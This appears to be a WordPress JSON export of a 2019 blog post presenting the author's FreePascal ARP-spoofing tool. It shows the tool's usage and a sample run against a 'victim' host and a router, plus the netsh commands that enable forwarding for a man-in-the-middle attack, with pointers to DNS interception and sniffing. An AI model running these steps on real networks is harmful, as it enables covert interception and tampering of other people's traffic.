{"id":2087,"date":"2019-02-23T21:52:00","date_gmt":"2019-02-23T20:52:00","guid":{"rendered":"http:\/\/labalec.fr\/erwan\/?p=2087"},"modified":"2019-02-24T14:05:55","modified_gmt":"2019-02-24T13:05:55","slug":"arpspoof-freepascal","status":"publish","type":"post","link":"https:\/\/labalec.fr\/erwan\/?p=2087","title":{"rendered":"arpspoof-freepascal"},"content":{"rendered":"<p>Lets play with <a href=\"https:\/\/www.winpcap.org\/\" rel=\"noopener\" target=\"_blank\">Winpcap<\/a>.<\/p>\n<p>Quoting the winpcap web site : <em>\u00ab\u00a0WinPcap consists of a driver that extends the operating system to provide low-level network access and a library that is used to easily access low-level network layers\u00a0\u00bb.<\/em><\/p>\n<p>Lets use it to perform a quick and easy <a href=\"https:\/\/en.wikipedia.org\/wiki\/Man-in-the-middle_attack\" rel=\"noopener\" target=\"_blank\">man-in-the-middle-attack<\/a> with <a href=\"https:\/\/en.wikipedia.org\/wiki\/ARP_spoofing\" rel=\"noopener\" target=\"_blank\">arp spoofing<\/a>.<\/p>\n<p>Quoting wikipedia : <em>\u00ab\u00a0a man-in-the-middle attack (MITM) is an attack where the attacker secretly relays and possibly alters the communication between two parties who believe they are directly communicating with each other\u00a0\u00bb.<\/em><\/p>\n<p>Source code and binaries are available <a href=\"https:\/\/github.com\/erwan2212\/arpspoof-freepascal\" rel=\"noopener\" target=\"_blank\">here<\/a>.<\/p>\n<p>Usage is:<br \/>\n<strong>arpspoof 1.0 by erwan2212@gmail.com<br \/>\narpspoof list-interfaces<br \/>\narpspoof interface-index ip1 ip2<\/strong><\/p>\n<p>Example:<br \/>\n<strong>arpspoof.exe 0 192.168.1.125 192.168.1.250<br \/>\narpspoof 1.0 by erwan2212@gmail.com<br \/>\narpspoof list-interfaces<br \/>\narpspoof interface-index ip1 ip2<br \/>\nip1:192.168.1.125 mac1:001DE0-567737<br \/>\nip2:192.168.1.250 mac2:C05627-B7FD32<br \/>\nspoofed mac:94DE80-C2A41E<br \/>\nsending packets&#8230;press a key to stop&#8230;<\/strong><\/p>\n<p>192.168.1.125 is victim (a computer on my network).<br \/>\n192.168.1.250 is my network gateway\/router on my network.<br \/>\n94DE80-C2A41E is my mac address (i.e the attacker mac address).<\/p>\n<p>192.168.1.125 will believe that mac address of the router (192.168.1.250) is mine i.e 94DE80-C2A41E.<br \/>\n192.168.1.250 will believe that mac address of the victim (192.168.1.125) is mine i.e 94DE80-C2A41E.<br \/>\nIn effect all traffic between these 2 hosts will go thru my computer.<\/p>\n<p>One important thing not to forget : enable forwarding on your computer or else all traffic between these 2 hosts will be dropped.<br \/>\nHow? easy :<br \/>\n-check your interfaces : <strong>netsh interface ipv4 show interfaces<\/strong><br \/>\n-enable forwarding on the desired interface : <strong>netsh interface ipv4 set interface x forwarding=\u00a0\u00bbenabled\u00a0\u00bb<\/strong><\/p>\n<p>Now you can perform an attack with <a href=\"https:\/\/labalec.fr\/erwan\/?p=2082\" rel=\"noopener\" target=\"_blank\">intercept-dns<\/a> from a previous article (dont forget to do a set layer=forward on the command line then).<br \/>\nOr simply sniff\/capture the traffic with <a href=\"https:\/\/github.com\/erwan2212\/windivert-fpc\/tree\/master\/netdump\" rel=\"noopener\" target=\"_blank\">netdump<\/a>.<\/p>\n<p>Note that you could also use a GUI like <a href=\"https:\/\/labalec.fr\/erwan\/?p=1027\" rel=\"noopener\" target=\"_blank\">Iptools <\/a>to perform arpspoof.<br \/>\nSee example screenshot <a href=\"https:\/\/imgur.com\/a\/YNIvCh0\" rel=\"noopener\" target=\"_blank\">here <\/a>(C=client\/victim, R=router).<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Lets play with Winpcap. Quoting the winpcap web site : \u00ab\u00a0WinPcap consists of a driver that extends the operating system to provide low-level network access and a library that is used to easily access low-level network layers\u00a0\u00bb. Lets use it to perform a quick and easy man-in-the-middle-attack with arp spoofing. Quoting wikipedia : \u00ab\u00a0a man-in-the-middle <a href='https:\/\/labalec.fr\/erwan\/?p=2087' class='excerpt-more'>[&#8230;]<\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[108,107,106],"class_list":["post-2087","post","type-post","status-publish","format-standard","hentry","category-network","tag-arpspoof","tag-mitm","tag-winpcap","category-5-id","post-seq-1","post-parity-odd","meta-position-corners","fix"],"_links":{"self":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2087","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2087"}],"version-history":[{"count":8,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2087\/revisions"}],"predecessor-version":[{"id":2099,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2087\/revisions\/2099"}],"wp:attachment":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2087"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2087"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2087"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}